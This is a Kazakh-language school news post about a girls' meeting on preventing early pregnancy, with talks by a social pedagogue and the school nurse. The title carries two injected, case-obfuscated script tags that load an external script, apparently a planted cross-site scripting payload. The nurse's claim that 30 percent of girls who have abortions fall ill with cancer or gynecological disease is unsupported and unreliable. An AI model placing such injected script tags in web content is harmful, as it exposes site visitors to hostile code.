«Ерте жүктіліктің алдын алу» атты қыздар жиналысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.04.2023 «ЕРТЕ ЖҮКТІЛІКТІҢ АЛДЫН АЛУ» тақырыбында қыздар жиналысы өткізілді . "Тасты ауылының ЖОББМ"КММ - де 2023 жылдың 11 сәуір күні әлеуметтік педагог Мусина Жанат Баяновна , тәлімгер Байгужина Куаныш Ерсаяновнаның ұйымдастыруымен, мектеп медбикесі Топалова Динара Максотовнаның үйлестіруімен, 8-11 сынып қыздарының қатысуымен Қазақстан Республикасындағы адамгершілік жыныстық тәрбие жөніндегі тұжырымдама аясында «Ерте жүктіліктің алдын алу» атты қыздар жиналысы талапқа сай өткізілді . Мектебіміздің медбикесі Топалова Динара Максотовна сөз алып, «Ерте жүктіліктен қалай сақтануға болады? Ерте жүктілік немен қауіпті?, - деген сауал төңірегінде ой қозғап, 8-11 сынып қыздарымен пікір алмасты. Жасанды түсік — болашақта бала сүю мүмкіндігін төмендететіні, яғни бедеулікке апарып соқтыратыны, жасанды түсік жасататын қыздардың 30 пайызы онкологиялық , гинекологиялық ауруларға шалдығатыны туралы айтып өтті. Әлеуметтік педагог Мусина Жанат Баяновна сөз алып, қыз балаларда өтпелі жас кезеңі басталып, гормондық қайта құрылу жүреді . Көптеген отбасында әңгіме қозғалмай , жабық күйде қалады . Бірақ , бұл - дұрыс еместігін айтып өтті. Қоғамның дамуы мен мемлекеттің өркендеуі - келешек аналар қолында , қыз баланың тәрбиесіне де байланысты екенін түсіндірді . Осы тақырыпқа сай жадынамалар таратты.
Просмотров: 1054


Пікір қосу



Деректерді қолтаңбаға қосу